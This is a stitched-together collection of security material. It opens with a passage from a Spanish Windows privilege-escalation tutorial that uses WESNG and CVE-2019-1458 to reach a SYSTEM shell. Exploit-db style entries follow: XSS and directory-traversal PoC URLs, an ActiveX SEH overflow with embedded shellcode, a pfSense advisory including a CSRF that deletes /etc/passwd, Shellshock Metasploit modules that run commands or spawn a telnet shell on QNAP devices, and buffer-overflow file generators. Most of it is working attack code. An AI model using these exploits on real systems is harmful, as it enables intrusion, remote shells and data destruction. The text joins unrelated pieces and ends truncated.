El argumento pwned es el nombre del recurso compartido, y el segundo argumento $(pwd) es la forma en la que le indicamos la ruta donde se ejecutará el servidor, en este caso, la ruta actual (también podríamos indicarlo con solo un punto).
Teniendo el servidor montado, nos dirigimos al Windows y simplemente redirigimos la salida del comando a nuestro servidor y recurso compartido:
Podemos confirmar que ha habido conexión si nos dirigimos al kali:
De esta forma, ya tenemos la salida del systeminfo:
Teniendo esto, vamos a hacer uso del «WESNG», lo primero es actualizar la base de datos de este. Es muy sencillo, simplemente lanzamos el siguiente comando:
Con esto, habrá actualizado el listado de CVEs.
El comando más básico de todos simplemente sería especificarle el archivo systeminfo:
Su salida es demasiado grande como para mostrarlo
Pero no pasa nada, vamos a usar algunos argumentos para solo ver lo que nos interesa. La estructura que sigue WESNG para mostrar cada CVE al cual puede ser vulnerable la máquina Windows, es la siguiente:
El campo que nos interesa es el Impact. Podemos ver los posibles valores de Impact usando grep y sort:
De esta forma, si nos fijamos, hay un valor de este campo que puede que sea por el que nos interese filtrar. Estoy hablando de «Elevation of Privilege», ya que es lo que queremos conseguir.
Sabiendo esto, podemos especificar a «WESNG» que solo nos muestre los CVE cuyo impacto sea una elevación de privilegios:
De esta forma, acabamos de pasar de 31883 líneas a:
Que siguen siendo muchas, pero ahora es trabajo nuestro encontrar el exploit a usar. Existe otro filtrado que quizás nos interese, ya que «WESNG» muestra algunos CVE sin «Exploits» (que OJO, no quiere decir que no haya, sino que al menos, no tiene ninguno asociado):
Si no nos interesa ver los CVEs los cuales no tengan ningún exploit asociado, podemos filtrar la búsqueda añadiendo el argumento --exploits-only:
Si vemos ahora el número de líneas, hemos bajado mucho más:
Hasta aquí posibles filtrados que nos puede interesar a la hora de buscar CVEs en «WESNG». Aun así, la herramienta tiene un panel de ayuda bastante completo y con muchas más opciones.
Llegados a este punto, ya dependerá de nosotros el exploit a escoger, con la experiencia habrá CVEs que nos suenen y vayamos al grano a probar esos según el sistema operativo. Esto ya se consigue con el tiempo y el esfuerzo.
En mi caso, voy a usar el «CVE-2019-1458», que ojo, el Windows 7 es vulnerable, y podemos encontrar exploits, sin embargo, «WESNG» indica que no tiene ninguno asociado, por lo que si hubiésemos usado el argumento --exploits-only, lo hubiese descartado, a pesar de ser vulnerable:
Habiendo localizado el CVE, vamos a dirigirnos a SecWiki para ver si tiene el exploit compilado:
En este caso, SecWiki, no tiene ningún exploit en el repositorio. Sin embargo, en el README.md nos indica otro repositorio el cual si contiene un exploit para este CVE:
Es típico que en los repositorios de exploits de escalación de privilegios se nos haga un PoC (Proof of Concept) del exploit:
En este caso, vemos dos cosas:
- El exploit solo se puede ejecutar una vez por cada inicio del sistema (esto nos puede indicar la inestabilidad resultante del exploit en el sistema).
- El exploit sigue la estructura de:
cve-2019-1458.exe <comando a ejecutar>
Sabiendo esto y teniendo descargado el binario del exploit en el Windows 7:
Vamos a escalar privilegios.
Establecemos un servidor samba en nuestro kali, además de ponernos en escucha:
Nota: el directorio donde nos encontramos ejecutando el servidor samba, contiene el binario «nc.exe» (netcat para Windows)
Ahora, volvemos al Windows 7, y ejecutaremos el siguiente comando usando el exploit:
De esta forma, volviendo al kali:
Conseguimos shell como «nt authority\system».
En el repositorio se nos indicaba que solo era un exploit de un solo uso por cada inicio, podemos confirmarlo:
Es tal la inestabilidad de en este caso, este exploit (y en general, de los exploits que se aprovechan del kernel), que cuando apagamos la máquina nos sale lo siguiente:
Esto no pasa claramente con todos los exploits, pero sí que podemos observar la delicadeza de lidiar con el kernel.
Retomando las herramientas mencionadas al principio:
- Windows Exploit Suggester Next Generation
- Watson
- En metasploit: windows/gather/enum_patches
- Internet
Podemos usar la que más nos guste, Watson por ejemplo en este caso no nos da nada:
El módulo de metasploit también nos ayuda en esta tarea:
En este caso no nos da ningún output significativo. Si detectase alguna posible vulnerabilidad nos lo indicaría de la siguiente forma:
Por último, pero no menos importante, otra herramienta a tener en cuenta es el propio internet.
Cuando ejecutamos systeminfo obtenemos la suficiente información como para buscar en Google alguna vulnerabilidad que afecte al Sistema Operativo y a la Versión:
De esta forma, aunque nos podamos ayudar de distintas herramientas, al final el trabajo manual y la propia investigación será lo que resulte en una escalada de privilegios exitosa.
source: https://www.securityfocus.com/bid/51301/info
Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.
Astaro Security Gateway 8.1 is vulnerable; other versions may also be affected.
<div style="left: 300px; top: 220px; z-index: 2000; visibility: visible;" class="iPopUp" id="iPopup_2"><div
class="iPopUpTitle">Please confirm:</div><div class="iPopUpText"><p>​​​​​Are you sure
that you want to delete the X509 certificate
with private key object '>"<INCLUDED PERSISTENT SCRIPTCODE HERE!!!">'?</p></iframe></p></div><table border="0"
cellpadding="0" cellspacing="0"><tbody><tr><td style="padding: 2px;"><div id="btnDefault_iPopup_2" class="button"
style="width:
auto; cursor: pointer; color: black; font-weight: bold;"><div class="button_left"></div><div class="button_center"
style="width:
auto;"><span style="font-weight: normal;">OK</span></div><div
class="button_right"></div></div></td>​​​​​<td style="padding:
2px;"><div class="button" style="width: auto; cursor: pointer; color: black;"><div class="button_left"></div><div
class="button_center" style="width: auto;"><span style="font-weight: normal;">Cancel</span></div><div
class="button_right"></div></div></td></tr></tbody></table></div>
../index.dat
source: https://www.securityfocus.com/bid/51294/info
SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SQLiteManager 1.2.4 is vulnerable; other versions may also be affected.
IE-only
http://www.example.com/sqlite/?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
http://www.example.com/sqlite/index.php?dbsel=" stYle="x:expre/**/ssion(alert(document.cookie))
http://www.example.com/sqlite/index.php?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
source: https://www.securityfocus.com/bid/51294/info
SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SQLiteManager 1.2.4 is vulnerable; other versions may also be affected.
http://www.example.com/sqlite/main.php?dbsel='"</script><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/51293/info
VertrigoServ is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VertrigoServ 2.25 is vulnerable; other versions may also be affected.
http://www.example.com/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/51291/info
Microsoft Anti-Cross Site Scripting (AntiXSS) Library is prone to a security-bypass vulnerability that affects the sanitization module.
An attacker can exploit this vulnerability to bypass the filter and conduct cross-site scripting attacks. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.
Microsoft Anti-Cross Site Scripting Library 3.x and 4.0 are vulnerable.
string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div>");
string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style="">aaa</div>")
<html>
<!--
# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
# Date: 26th MArch, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: 1, 6, 42, 0
# Tested on: Windows XP SP3 (IE6/7/8)
# CVE : 2015-2097
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid = "WESPMONITORLib.WESPMonitorCtrl"
argCount = 1
For full analysis of the exploit refer
http://blog.disects.com/2015/03/webgate-edvr-manager.html
-->
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
</object>
<script>
var arg1 = "";
nops = "";
var buff = "";
for(i=0;i<268;i++)
{
arg1 += "B";
}
nseh = "\xeb\x10\x90\x90"; //jmp over addr
seh = "\x71\x47\x01\x10"; //pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
for(i=0;i<200;i++)
{
nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
{
buff += "A";
}
// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
fbuff = arg1 + nseh + seh + nops + sc + buff;
target.LoadImage(fbuff);
</script>
</html>
Advisory ID: HTB23251
Product: pfSense
Vendor: Electric Sheep Fencing LLC
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Advisory Publication: March 4, 2015 [without technical details]
Vendor Notification: March 4, 2015
Vendor Patch: March 5, 2015
Public Disclosure: March 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-2294, CVE-2015-2295
Risk Level: Medium
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
The following PoC code deletes file "/etc/passwd":
https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
-----------------------------------------------------------------------------------------------
Solution:
Update to pfSense 2.2.1
More Information:
https://blog.pfsense.org/?p=1661
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense.
[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; #{datastore['CMD']}"
})
if res.body.empty?
print_error("No data found.")
elsif res.code== 302
print_status("#{rhost}:#{rport} - bash env variable injected")
puts " "
print_line(res.body)
end
end
end
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png
from struct import pack
file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit_telnet()
telnetport = datastore['LTELNET']
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
print_status("#{rhost}:#{rport} - Sending exploit")
begin
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service spawned")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
end
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => nil,
'PASSWORD' => nil
}
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
end
return
end
def run
begin
telnetport = datastore['LTELNET']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
})
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
exploit_telnet()
end
end
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Original POC:
# http://www.exploit-db.com/exploits/11197/
#POC:
#IMG1:
#http://i.imgur.com/ifXYgwx.png
#IMG2:
#http://i.imgur.com/ZMisj6R.png
from struct import pack
file="crack.m3u"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()
source: https://www.securityfocus.com/bid/51286/info
HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
HServer 0.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/..%5c..%5c..%5cboot.ini
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts
source: https://www.securityfocus.com/bid/51280/info
StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
StatIt 4 is vulnerable; other versions may be affected.
The following example URIs are available:
